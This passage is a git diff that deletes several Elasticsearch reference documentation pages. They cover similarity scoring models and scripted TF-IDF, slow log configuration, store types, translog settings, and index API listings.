- -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "index": { - "similarity": { - "my_similarity": { - "type": "DFR", - "basic_model": "g", - "after_effect": "l", - "normalization": "h2", - "normalization.h2.c": "3.0" - } - } - } - } -} --------------------------------------------------- - -Here we configure the DFR similarity so it can be referenced as -`my_similarity` in mappings as is illustrate in the below example: - -[source,console] --------------------------------------------------- -PUT /index/_mapping -{ - "properties" : { - "title" : { "type" : "text", "similarity" : "my_similarity" } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -=== Available similarities - -[discrete] -[[bm25]] -==== BM25 similarity (*default*) - -TF/IDF based similarity that has built-in tf normalization and -is supposed to work better for short fields (like names). See -{wikipedia}/Okapi_BM25[Okapi_BM25] for more details. -This similarity has the following options: - -[horizontal] -`k1`:: - Controls non-linear term frequency normalization - (saturation). The default value is `1.2`. - -`b`:: - Controls to what degree document length normalizes tf values. - The default value is `0.75`. - -`discount_overlaps`:: - Determines whether overlap tokens (Tokens with - 0 position increment) are ignored when computing norm. By default this - is true, meaning overlap tokens do not count when computing norms. - -Type name: `BM25` - -[discrete] -[[dfr]] -==== DFR similarity - -Similarity that implements the -{lucene-core-javadoc}/org/apache/lucene/search/similarities/DFRSimilarity.html[divergence -from randomness] framework. This similarity has the following options: - -[horizontal] -`basic_model`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelG.html[`g`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIF.html[`if`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIn.html[`in`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/BasicModelIne.html[`ine`]. - -`after_effect`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/AfterEffectB.html[`b`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/AfterEffectL.html[`l`]. - -`normalization`:: - Possible values: {lucene-core-javadoc}/org/apache/lucene/search/similarities/Normalization.NoNormalization.html[`no`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH1.html[`h1`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH2.html[`h2`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationH3.html[`h3`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/NormalizationZ.html[`z`]. - -All options but the first option need a normalization value. - -Type name: `DFR` - -[discrete] -[[dfi]] -==== DFI similarity - -Similarity that implements the https://trec.nist.gov/pubs/trec21/papers/irra.web.nb.pdf[divergence from independence] -model. 
-This similarity has the following options: - -[horizontal] -`independence_measure`:: Possible values - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceStandardized.html[`standardized`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceSaturated.html[`saturated`], - {lucene-core-javadoc}/org/apache/lucene/search/similarities/IndependenceChiSquared.html[`chisquared`]. - -When using this similarity, it is highly recommended *not* to remove stop words to get -good relevance. Also beware that terms whose frequency is less than the expected -frequency will get a score equal to 0. - -Type name: `DFI` - -[discrete] -[[ib]] -==== IB similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/IBSimilarity.html[Information -based model] . The algorithm is based on the concept that the information content in any symbolic 'distribution' -sequence is primarily determined by the repetitive usage of its basic elements. -For written texts this challenge would correspond to comparing the writing styles of different authors. -This similarity has the following options: - -[horizontal] -`distribution`:: Possible values: - {lucene-core-javadoc}/org/apache/lucene/search/similarities/DistributionLL.html[`ll`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/DistributionSPL.html[`spl`]. -`lambda`:: Possible values: - {lucene-core-javadoc}/org/apache/lucene/search/similarities/LambdaDF.html[`df`] and - {lucene-core-javadoc}/org/apache/lucene/search/similarities/LambdaTTF.html[`ttf`]. -`normalization`:: Same as in `DFR` similarity. - -Type name: `IB` - -[discrete] -[[lm_dirichlet]] -==== LM Dirichlet similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/LMDirichletSimilarity.html[LM -Dirichlet similarity] . This similarity has the following options: - -[horizontal] -`mu`:: Default to `2000`. - -The scoring formula in the paper assigns negative scores to terms that have -fewer occurrences than predicted by the language model, which is illegal to -Lucene, so such terms get a score of 0. - -Type name: `LMDirichlet` - -[discrete] -[[lm_jelinek_mercer]] -==== LM Jelinek Mercer similarity. - -{lucene-core-javadoc}/org/apache/lucene/search/similarities/LMJelinekMercerSimilarity.html[LM -Jelinek Mercer similarity] . The algorithm attempts to capture important patterns in the text, while leaving out noise. This similarity has the following options: - -[horizontal] -`lambda`:: The optimal value depends on both the collection and the query. The optimal value is around `0.1` -for title queries and `0.7` for long queries. Default to `0.1`. When value approaches `0`, documents that match more query terms will be ranked higher than those that match fewer terms. - -Type name: `LMJelinekMercer` - -[discrete] -[[scripted_similarity]] -==== Scripted similarity - -A similarity that allows you to use a script in order to specify how scores -should be computed. 
For instance, the below example shows how to reimplement -TF-IDF: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "number_of_shards": 1, - "similarity": { - "scripted_tfidf": { - "type": "scripted", - "script": { - "source": "double tf = Math.sqrt(doc.freq); double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; double norm = 1/Math.sqrt(doc.length); return query.boost * tf * idf * norm;" - } - } - } - }, - "mappings": { - "properties": { - "field": { - "type": "text", - "similarity": "scripted_tfidf" - } - } - } -} - -PUT /index/_doc/1 -{ - "field": "foo bar foo" -} - -PUT /index/_doc/2 -{ - "field": "bar baz" -} - -POST /index/_refresh - -GET /index/_search?explain=true -{ - "query": { - "query_string": { - "query": "foo^1.7", - "default_field": "field" - } - } -} --------------------------------------------------- - -Which yields: - -[source,console-result] --------------------------------------------------- -{ - "took": 12, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.9508477, - "hits": [ - { - "_shard": "[index][0]", - "_node": "OzrdjxNtQGaqs4DmioFw9A", - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 1.9508477, - "_source": { - "field": "foo bar foo" - }, - "_explanation": { - "value": 1.9508477, - "description": "weight(field:foo in 0) [PerFieldSimilarity], result of:", - "details": [ - { - "value": 1.9508477, - "description": "score from ScriptedSimilarity(weightScript=[null], script=[Script{type=inline, lang='painless', idOrCode='double tf = Math.sqrt(doc.freq); double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; double norm = 1/Math.sqrt(doc.length); return query.boost * tf * idf * norm;', options={}, params={}}]) computed from:", - "details": [ - { - "value": 1.0, - "description": "weight", - "details": [] - }, - { - "value": 1.7, - "description": "query.boost", - "details": [] - }, - { - "value": 2, - "description": "field.docCount", - "details": [] - }, - { - "value": 4, - "description": "field.sumDocFreq", - "details": [] - }, - { - "value": 5, - "description": "field.sumTotalTermFreq", - "details": [] - }, - { - "value": 1, - "description": "term.docFreq", - "details": [] - }, - { - "value": 2, - "description": "term.totalTermFreq", - "details": [] - }, - { - "value": 2.0, - "description": "doc.freq", - "details": [] - }, - { - "value": 3, - "description": "doc.length", - "details": [] - } - ] - } - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 12/"took" : $body.took/] -// TESTRESPONSE[s/OzrdjxNtQGaqs4DmioFw9A/$body.hits.hits.0._node/] - -WARNING: While scripted similarities provide a lot of flexibility, there is -a set of rules that they need to satisfy. Failing to do so could make -Elasticsearch silently return wrong top hits or fail with internal errors at -search time: - - - Returned scores must be positive. - - All other variables remaining equal, scores must not decrease when - `doc.freq` increases. - - All other variables remaining equal, scores must not increase when - `doc.length` increases. - -You might have noticed that a significant part of the above script depends on -statistics that are the same for every document. 
It is possible to make the -above slightly more efficient by providing an `weight_script` which will -compute the document-independent part of the score and will be available -under the `weight` variable. When no `weight_script` is provided, `weight` -is equal to `1`. The `weight_script` has access to the same variables as -the `script` except `doc` since it is supposed to compute a -document-independent contribution to the score. - -The below configuration will give the same tf-idf scores but is slightly -more efficient: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "number_of_shards": 1, - "similarity": { - "scripted_tfidf": { - "type": "scripted", - "weight_script": { - "source": "double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; return query.boost * idf;" - }, - "script": { - "source": "double tf = Math.sqrt(doc.freq); double norm = 1/Math.sqrt(doc.length); return weight * tf * norm;" - } - } - } - }, - "mappings": { - "properties": { - "field": { - "type": "text", - "similarity": "scripted_tfidf" - } - } - } -} --------------------------------------------------- - -//////////////////// - -[source,console] --------------------------------------------------- -PUT /index/_doc/1 -{ - "field": "foo bar foo" -} - -PUT /index/_doc/2 -{ - "field": "bar baz" -} - -POST /index/_refresh - -GET /index/_search?explain=true -{ - "query": { - "query_string": { - "query": "foo^1.7", - "default_field": "field" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 1, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.9508477, - "hits": [ - { - "_shard": "[index][0]", - "_node": "OzrdjxNtQGaqs4DmioFw9A", - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 1.9508477, - "_source": { - "field": "foo bar foo" - }, - "_explanation": { - "value": 1.9508477, - "description": "weight(field:foo in 0) [PerFieldSimilarity], result of:", - "details": [ - { - "value": 1.9508477, - "description": "score from ScriptedSimilarity(weightScript=[Script{type=inline, lang='painless', idOrCode='double idf = Math.log((field.docCount+1.0)/(term.docFreq+1.0)) + 1.0; return query.boost * idf;', options={}, params={}}], script=[Script{type=inline, lang='painless', idOrCode='double tf = Math.sqrt(doc.freq); double norm = 1/Math.sqrt(doc.length); return weight * tf * norm;', options={}, params={}}]) computed from:", - "details": [ - { - "value": 2.3892908, - "description": "weight", - "details": [] - }, - { - "value": 1.7, - "description": "query.boost", - "details": [] - }, - { - "value": 2, - "description": "field.docCount", - "details": [] - }, - { - "value": 4, - "description": "field.sumDocFreq", - "details": [] - }, - { - "value": 5, - "description": "field.sumTotalTermFreq", - "details": [] - }, - { - "value": 1, - "description": "term.docFreq", - "details": [] - }, - { - "value": 2, - "description": "term.totalTermFreq", - "details": [] - }, - { - "value": 2.0, - "description": "doc.freq", - "details": [] - }, - { - "value": 3, - "description": "doc.length", - "details": [] - } - ] - } - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 1/"took" : $body.took/] -// TESTRESPONSE[s/OzrdjxNtQGaqs4DmioFw9A/$body.hits.hits.0._node/] - 
-//////////////////// - -Type name: `scripted` - -[discrete] -[[default-base]] -==== Default Similarity - -By default, Elasticsearch will use whatever similarity is configured as -`default`. - -You can change the default similarity for all fields in an index when -it is <>: - -[source,console] --------------------------------------------------- -PUT /index -{ - "settings": { - "index": { - "similarity": { - "default": { - "type": "boolean" - } - } - } - } -} --------------------------------------------------- - -If you want to change the default similarity after creating the index -you must <> your index, send the following -request and <> it again afterwards: - -[source,console] --------------------------------------------------- -POST /index/_close - -PUT /index/_settings -{ - "index": { - "similarity": { - "default": { - "type": "boolean" - } - } - } -} - -POST /index/_open --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/index-modules/slowlog.asciidoc b/docs/reference/index-modules/slowlog.asciidoc deleted file mode 100644 index 2bbc80e5e81..00000000000 --- a/docs/reference/index-modules/slowlog.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[index-modules-slowlog]] -== Slow Log - -[discrete] -[[search-slow-log]] -=== Search Slow Log - -Shard level slow search log allows to log slow search (query and fetch -phases) into a dedicated log file. - -Thresholds can be set for both the query phase of the execution, and -fetch phase, here is a sample: - -[source,yaml] --------------------------------------------------- -index.search.slowlog.threshold.query.warn: 10s -index.search.slowlog.threshold.query.info: 5s -index.search.slowlog.threshold.query.debug: 2s -index.search.slowlog.threshold.query.trace: 500ms - -index.search.slowlog.threshold.fetch.warn: 1s -index.search.slowlog.threshold.fetch.info: 800ms -index.search.slowlog.threshold.fetch.debug: 500ms -index.search.slowlog.threshold.fetch.trace: 200ms - -index.search.slowlog.level: info --------------------------------------------------- - -All of the above settings are _dynamic_ and can be set for each index using the -<> API. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.search.slowlog.threshold.query.warn": "10s", - "index.search.slowlog.threshold.query.info": "5s", - "index.search.slowlog.threshold.query.debug": "2s", - "index.search.slowlog.threshold.query.trace": "500ms", - "index.search.slowlog.threshold.fetch.warn": "1s", - "index.search.slowlog.threshold.fetch.info": "800ms", - "index.search.slowlog.threshold.fetch.debug": "500ms", - "index.search.slowlog.threshold.fetch.trace": "200ms", - "index.search.slowlog.level": "info" -} --------------------------------------------------- -// TEST[setup:my_index] - -By default, none are enabled (set to `-1`). Levels (`warn`, `info`, -`debug`, `trace`) allow to control under which logging level the log -will be logged. Not all are required to be configured (for example, only -`warn` threshold can be set). The benefit of several levels is the -ability to quickly "grep" for specific thresholds breached. - -The logging is done on the shard level scope, meaning the execution of a -search request within a specific shard. It does not encompass the whole -search request, which can be broadcast to several shards in order to -execute. 
Some of the benefits of shard level logging is the association -of the actual execution on the specific machine, compared with request -level. - -The logging file is configured by default using the following -configuration (found in `log4j2.properties`): - -[source,properties] --------------------------------------------------- -appender.index_search_slowlog_rolling.type = RollingFile -appender.index_search_slowlog_rolling.name = index_search_slowlog_rolling -appender.index_search_slowlog_rolling.fileName = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_search_slowlog.log -appender.index_search_slowlog_rolling.layout.type = PatternLayout -appender.index_search_slowlog_rolling.layout.pattern = [%d{ISO8601}][%-5p][%-25c] [%node_name]%marker %.-10000m%n -appender.index_search_slowlog_rolling.filePattern = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_search_slowlog-%i.log.gz -appender.index_search_slowlog_rolling.policies.type = Policies -appender.index_search_slowlog_rolling.policies.size.type = SizeBasedTriggeringPolicy -appender.index_search_slowlog_rolling.policies.size.size = 1GB -appender.index_search_slowlog_rolling.strategy.type = DefaultRolloverStrategy -appender.index_search_slowlog_rolling.strategy.max = 4 - -logger.index_search_slowlog_rolling.name = index.search.slowlog -logger.index_search_slowlog_rolling.level = trace -logger.index_search_slowlog_rolling.appenderRef.index_search_slowlog_rolling.ref = index_search_slowlog_rolling -logger.index_search_slowlog_rolling.additivity = false --------------------------------------------------- - -[discrete] -==== Identifying search slow log origin - -It is often useful to identify what triggered a slow running query. If a call was initiated with an `X-Opaque-ID` header, then the user ID -is included in Search Slow logs as an additional **id** field (scroll to the right). -[source,txt] ---------------------------- -[2030-08-30T11:59:37,786][WARN ][i.s.s.query ] [node-0] [index6][0] took[78.4micros], took_millis[0], total_hits[0 hits], stats[], search_type[QUERY_THEN_FETCH], total_shards[1], source[{"query":{"match_all":{"boost":1.0}}}], id[MY_USER_ID], ---------------------------- -// NOTCONSOLE -The user ID is also included in JSON logs. -[source,js] ---------------------------- -{ - "type": "index_search_slowlog", - "timestamp": "2030-08-30T11:59:37,786+02:00", - "level": "WARN", - "component": "i.s.s.query", - "cluster.name": "distribution_run", - "node.name": "node-0", - "message": "[index6][0]", - "took": "78.4micros", - "took_millis": "0", - "total_hits": "0 hits", - "stats": "[]", - "search_type": "QUERY_THEN_FETCH", - "total_shards": "1", - "source": "{\"query\":{\"match_all\":{\"boost\":1.0}}}", - "id": "MY_USER_ID", - "cluster.uuid": "Aq-c-PAeQiK3tfBYtig9Bw", - "node.id": "D7fUYfnfTLa2D7y-xw6tZg" -} ---------------------------- -// NOTCONSOLE - -[discrete] -[[index-slow-log]] -=== Index Slow log - -The indexing slow log, similar in functionality to the search slow -log. The log file name ends with `_index_indexing_slowlog.log`. Log and -the thresholds are configured in the same way as the search slowlog. 
-Index slowlog sample: - -[source,yaml] --------------------------------------------------- -index.indexing.slowlog.threshold.index.warn: 10s -index.indexing.slowlog.threshold.index.info: 5s -index.indexing.slowlog.threshold.index.debug: 2s -index.indexing.slowlog.threshold.index.trace: 500ms -index.indexing.slowlog.level: info -index.indexing.slowlog.source: 1000 --------------------------------------------------- - -All of the above settings are _dynamic_ and can be set for each index using the -<> API. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index.indexing.slowlog.threshold.index.warn": "10s", - "index.indexing.slowlog.threshold.index.info": "5s", - "index.indexing.slowlog.threshold.index.debug": "2s", - "index.indexing.slowlog.threshold.index.trace": "500ms", - "index.indexing.slowlog.level": "info", - "index.indexing.slowlog.source": "1000" -} --------------------------------------------------- -// TEST[setup:my_index] - -By default Elasticsearch will log the first 1000 characters of the _source in -the slowlog. You can change that with `index.indexing.slowlog.source`. Setting -it to `false` or `0` will skip logging the source entirely an setting it to -`true` will log the entire source regardless of size. The original `_source` is -reformatted by default to make sure that it fits on a single log line. If preserving -the original document format is important, you can turn off reformatting by setting -`index.indexing.slowlog.reformat` to `false`, which will cause the source to be -logged "as is" and can potentially span multiple log lines. - -The index slow log file is configured by default in the `log4j2.properties` -file: - -[source,properties] --------------------------------------------------- -appender.index_indexing_slowlog_rolling.type = RollingFile -appender.index_indexing_slowlog_rolling.name = index_indexing_slowlog_rolling -appender.index_indexing_slowlog_rolling.fileName = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_indexing_slowlog.log -appender.index_indexing_slowlog_rolling.layout.type = PatternLayout -appender.index_indexing_slowlog_rolling.layout.pattern = [%d{ISO8601}][%-5p][%-25c] [%node_name]%marker %.-10000m%n -appender.index_indexing_slowlog_rolling.filePattern = ${sys:es.logs.base_path}${sys:file.separator}${sys:es.logs.cluster_name}_index_indexing_slowlog-%i.log.gz -appender.index_indexing_slowlog_rolling.policies.type = Policies -appender.index_indexing_slowlog_rolling.policies.size.type = SizeBasedTriggeringPolicy -appender.index_indexing_slowlog_rolling.policies.size.size = 1GB -appender.index_indexing_slowlog_rolling.strategy.type = DefaultRolloverStrategy -appender.index_indexing_slowlog_rolling.strategy.max = 4 - -logger.index_indexing_slowlog.name = index.indexing.slowlog.index -logger.index_indexing_slowlog.level = trace -logger.index_indexing_slowlog.appenderRef.index_indexing_slowlog_rolling.ref = index_indexing_slowlog_rolling -logger.index_indexing_slowlog.additivity = false --------------------------------------------------- diff --git a/docs/reference/index-modules/store.asciidoc b/docs/reference/index-modules/store.asciidoc deleted file mode 100644 index 98f61e0ddab..00000000000 --- a/docs/reference/index-modules/store.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[index-modules-store]] -== Store - -The store module allows you to control how index data is stored and accessed on disk. - -NOTE: This is a low-level setting. 
Some store implementations have poor -concurrency or disable optimizations for heap memory usage. We recommend -sticking to the defaults. - -[discrete] -[[file-system]] -=== File system storage types - -There are different file system implementations or _storage types_. By default, -Elasticsearch will pick the best implementation based on the operating -environment. - -The storage type can also be explicitly set for all indices by configuring the -store type in the `config/elasticsearch.yml` file: - -[source,yaml] --------------------------------- -index.store.type: hybridfs --------------------------------- - -It is a _static_ setting that can be set on a per-index basis at index -creation time: - -[source,console] --------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.store.type": "hybridfs" - } -} --------------------------------- - -WARNING: This is an expert-only setting and may be removed in the future. - -The following section lists all the supported storage types. - -`fs`:: - -Default file system implementation. This will pick the best implementation -depending on the operating environment, which is currently `hybridfs` on all -supported systems but is subject to change. - -[[simplefs]]`simplefs`:: - -The Simple FS type is a straightforward implementation of file system -storage (maps to Lucene `SimpleFsDirectory`) using a random access file. -This implementation has poor concurrent performance (multiple threads -will bottleneck) and disables some optimizations for heap memory usage. - -[[niofs]]`niofs`:: - -The NIO FS type stores the shard index on the file system (maps to -Lucene `NIOFSDirectory`) using NIO. It allows multiple threads to read -from the same file concurrently. It is not recommended on Windows -because of a bug in the SUN Java implementation and disables some -optimizations for heap memory usage. - -[[mmapfs]]`mmapfs`:: - -The MMap FS type stores the shard index on the file system (maps to -Lucene `MMapDirectory`) by mapping a file into memory (mmap). Memory -mapping uses up a portion of the virtual memory address space in your -process equal to the size of the file being mapped. Before using this -class, be sure you have allowed plenty of -<>. - -[[hybridfs]]`hybridfs`:: - -The `hybridfs` type is a hybrid of `niofs` and `mmapfs`, which chooses the best -file system type for each type of file based on the read access pattern. -Currently only the Lucene term dictionary, norms and doc values files are -memory mapped. All other files are opened using Lucene `NIOFSDirectory`. -Similarly to `mmapfs`, be sure you have allowed plenty of -<>. - -[[allow-mmap]] -You can restrict the use of the `mmapfs` and the related `hybridfs` store type -via the setting `node.store.allow_mmap`. This is a boolean setting indicating -whether or not memory-mapping is allowed. The default is to allow it. This -setting is useful, for example, if you are in an environment where you cannot -control the ability to create a lot of memory maps, so you need to disable the -ability to use memory-mapping. - -[[preload-data-to-file-system-cache]] -=== Preloading data into the file system cache - -NOTE: This is an expert setting, the details of which may change in the future. - -By default, Elasticsearch completely relies on the operating system file system -cache for caching I/O operations. It is possible to set `index.store.preload` -in order to tell the operating system to load the content of hot index -files into memory upon opening.
This setting accepts a comma-separated list of -file extensions: all files whose extension is in the list will be pre-loaded -upon opening. This can be useful to improve search performance of an index, -especially when the host operating system is restarted, since this causes the -file system cache to be trashed. However, note that this may slow down the -opening of indices, as they will only become available after data have been -loaded into physical memory. - -This setting is best-effort only and may not work at all depending on the store -type and host operating system. - -`index.store.preload` is a static setting that can either be set in the -`config/elasticsearch.yml`: - -[source,yaml] --------------------------------- -index.store.preload: ["nvd", "dvd"] --------------------------------- - -or in the index settings at index creation time: - -[source,console] --------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.store.preload": ["nvd", "dvd"] - } -} --------------------------------- - -The default value is the empty array, which means that nothing will be loaded -into the file-system cache eagerly. For indices that are actively searched, -you might want to set it to `["nvd", "dvd"]`, which will cause norms and doc -values to be loaded eagerly into physical memory. These are the first two -extensions to look at since Elasticsearch performs random access on them. - -A wildcard can be used in order to indicate that all files should be preloaded: -`index.store.preload: ["*"]`. Note however that it is generally not useful to -load all files into memory, in particular those for stored fields and term -vectors, so a better option might be to set it to -`["nvd", "dvd", "tim", "doc", "dim"]`, which will preload norms, doc values, -terms dictionaries, postings lists and points, which are the most important -parts of the index for search and aggregations. - -Note that this setting can be dangerous on indices that are larger than the size -of the main memory of the host, as it would cause the filesystem cache to be -trashed upon reopens after large merges, which would make indexing and searching -_slower_. diff --git a/docs/reference/index-modules/translog.asciidoc b/docs/reference/index-modules/translog.asciidoc deleted file mode 100644 index 0ad2a989f6f..00000000000 --- a/docs/reference/index-modules/translog.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[index-modules-translog]] -== Translog - -Changes to Lucene are only persisted to disk during a Lucene commit, which is a -relatively expensive operation and so cannot be performed after every index or -delete operation. Changes that happen after one commit and before another will -be removed from the index by Lucene in the event of process exit or hardware -failure. - -Lucene commits are too expensive to perform on every individual change, so each -shard copy also writes operations into its _transaction log_ known as the -_translog_. All index and delete operations are written to the translog after -being processed by the internal Lucene index but before they are acknowledged. -In the event of a crash, recent operations that have been acknowledged but not -yet included in the last Lucene commit are instead recovered from the translog -when the shard recovers. - -An {es} <> is the process of performing a Lucene commit and -starting a new translog generation.
Flushes are performed automatically in the -background in order to make sure the translog does not grow too large, which -would make replaying its operations take a considerable amount of time during -recovery. The ability to perform a flush manually is also exposed through an -API, although this is rarely needed. - -[discrete] -=== Translog settings - -The data in the translog is only persisted to disk when the translog is -++fsync++ed and committed. In the event of a hardware failure or an operating -system crash or a JVM crash or a shard failure, any data written since the -previous translog commit will be lost. - -By default, `index.translog.durability` is set to `request` meaning that -Elasticsearch will only report success of an index, delete, update, or bulk -request to the client after the translog has been successfully ++fsync++ed and -committed on the primary and on every allocated replica. If -`index.translog.durability` is set to `async` then Elasticsearch ++fsync++s and -commits the translog only every `index.translog.sync_interval` which means that -any operations that were performed just before a crash may be lost when the node -recovers. - -The following <> per-index -settings control the behaviour of the translog: - -`index.translog.sync_interval`:: - - How often the translog is ++fsync++ed to disk and committed, regardless of - write operations. Defaults to `5s`. Values less than `100ms` are not allowed. - -`index.translog.durability`:: -+ --- - -Whether or not to `fsync` and commit the translog after every index, delete, -update, or bulk request. This setting accepts the following parameters: - -`request`:: - - (default) `fsync` and commit after every request. In the event of hardware - failure, all acknowledged writes will already have been committed to disk. - -`async`:: - - `fsync` and commit in the background every `sync_interval`. In - the event of a failure, all acknowledged writes since the last - automatic commit will be discarded. --- - -`index.translog.flush_threshold_size`:: - - The translog stores all operations that are not yet safely persisted in Lucene - (i.e., are not part of a Lucene commit point). Although these operations are - available for reads, they will need to be replayed if the shard was stopped - and had to be recovered. This setting controls the maximum total size of these - operations, to prevent recoveries from taking too long. Once the maximum size - has been reached a flush will happen, generating a new Lucene commit point. - Defaults to `512mb`. - -[discrete] -[[index-modules-translog-retention]] -==== Translog retention - -deprecated::[7.4.0, "Translog retention settings are deprecated in favor of <>. These settings are effectively ignored since 7.4 and will be removed in a future version."] - -If an index is not using <> to -retain historical operations then {es} recovers each replica shard by replaying -operations from the primary's translog. This means it is important for the -primary to preserve extra operations in its translog in case it needs to -rebuild a replica. Moreover it is important for each replica to preserve extra -operations in its translog in case it is promoted to primary and then needs to -rebuild its own replicas in turn. The following settings control how much -translog is retained for peer recoveries. - -`index.translog.retention.size`:: - - This controls the total size of translog files to keep for each shard. 
- Keeping more translog files increases the chance of performing an operation - based sync when recovering a replica. If the translog files are not - sufficient, replica recovery will fall back to a file based sync. Defaults to - `512mb`. This setting is ignored, and should not be set, if soft deletes are - enabled. Soft deletes are enabled by default in indices created in {es} - versions 7.0.0 and later. - -`index.translog.retention.age`:: - - This controls the maximum duration for which translog files are kept by each - shard. Keeping more translog files increases the chance of performing an - operation based sync when recovering replicas. If the translog files are not - sufficient, replica recovery will fall back to a file based sync. Defaults to - `12h`. This setting is ignored, and should not be set, if soft deletes are - enabled. Soft deletes are enabled by default in indices created in {es} - versions 7.0.0 and later. diff --git a/docs/reference/index.asciidoc b/docs/reference/index.asciidoc deleted file mode 100644 index 1e39636c319..00000000000 --- a/docs/reference/index.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[elasticsearch-reference]] -= Elasticsearch Reference - -:include-xpack: true -:es-test-dir: {elasticsearch-root}/docs/src/test -:plugins-examples-dir: {elasticsearch-root}/plugins/examples -:xes-repo-dir: {elasticsearch-root}/x-pack/docs/{lang} -:es-repo-dir: {elasticsearch-root}/docs/reference - -include::../Versions.asciidoc[] -include::links.asciidoc[] - -include::intro.asciidoc[] - -include::release-notes/highlights.asciidoc[] - -include::getting-started.asciidoc[] - -include::setup.asciidoc[] - -include::upgrade.asciidoc[] - -include::index-modules.asciidoc[] - -include::mapping.asciidoc[] - -include::analysis.asciidoc[] - -include::indices/index-templates.asciidoc[] - -include::data-streams/data-streams.asciidoc[] - -include::ingest.asciidoc[] - -include::search/search-your-data/search-your-data.asciidoc[] - -include::query-dsl.asciidoc[] - -include::aggregations.asciidoc[] - -include::eql/eql.asciidoc[] - -include::sql/index.asciidoc[] - -include::scripting.asciidoc[] - -include::data-management.asciidoc[] - -include::ilm/index.asciidoc[] - -ifdef::permanently-unreleased-branch[] - -include::autoscaling/index.asciidoc[] - -endif::[] - -include::monitoring/index.asciidoc[] - -include::frozen-indices.asciidoc[] - -include::data-rollup-transform.asciidoc[] - -include::high-availability.asciidoc[] - -include::snapshot-restore/index.asciidoc[] - -include::{xes-repo-dir}/security/index.asciidoc[] - -include::{xes-repo-dir}/watcher/index.asciidoc[] - -include::commands/index.asciidoc[] - -include::how-to.asciidoc[] - -include::glossary.asciidoc[] - -include::rest-api/index.asciidoc[] - -include::migration/index.asciidoc[] - -include::release-notes.asciidoc[] - -include::redirects.asciidoc[] diff --git a/docs/reference/index.x.asciidoc b/docs/reference/index.x.asciidoc deleted file mode 100644 index 35204eef5b6..00000000000 --- a/docs/reference/index.x.asciidoc +++ /dev/null @@ -1 +0,0 @@ -include::index.asciidoc[] diff --git a/docs/reference/indices.asciidoc b/docs/reference/indices.asciidoc deleted file mode 100644 index 46352a7a7d0..00000000000 --- a/docs/reference/indices.asciidoc +++ /dev/null @@ -1,192 +0,0 @@ -[[indices]] -== Index APIs - -Index APIs are used to manage individual indices, -index settings, aliases, mappings, and index templates. 
- -[discrete] -[[index-management]] -=== Index management: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -[discrete] -[[mapping-management]] -=== Mapping management: - -* <> -* <> -* <> -* <> - -[discrete] -[[alias-management]] -=== Alias management: -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[index-settings]] -=== Index settings: -* <> -* <> -* <> - -[discrete] -[[index-templates-apis]] -=== Index templates: - -Index templates automatically apply settings, mappings, and aliases to new indices. -They are most often used to configure rolling indices for time series data to -ensure that each new index has the same configuration as the previous one. -The index template associated with a data stream configures its backing indices. -For more information, see <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[monitoring]] -=== Monitoring: -* <> -* <> -* <> -* <> - -[discrete] -[[status-management]] -=== Status management: -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[dangling-indices-api]] -=== Dangling indices: -* <> -* <> -* <> - - - -include::indices/add-alias.asciidoc[] - -include::indices/analyze.asciidoc[] - -include::indices/clearcache.asciidoc[] - -include::indices/clone-index.asciidoc[] - -include::indices/close.asciidoc[] - -include::indices/create-index.asciidoc[] - -include::indices/delete-index.asciidoc[] - -include::indices/delete-alias.asciidoc[] - -include::indices/delete-component-template.asciidoc[] - -include::indices/delete-index-template.asciidoc[] - -include::indices/delete-index-template-v1.asciidoc[] - 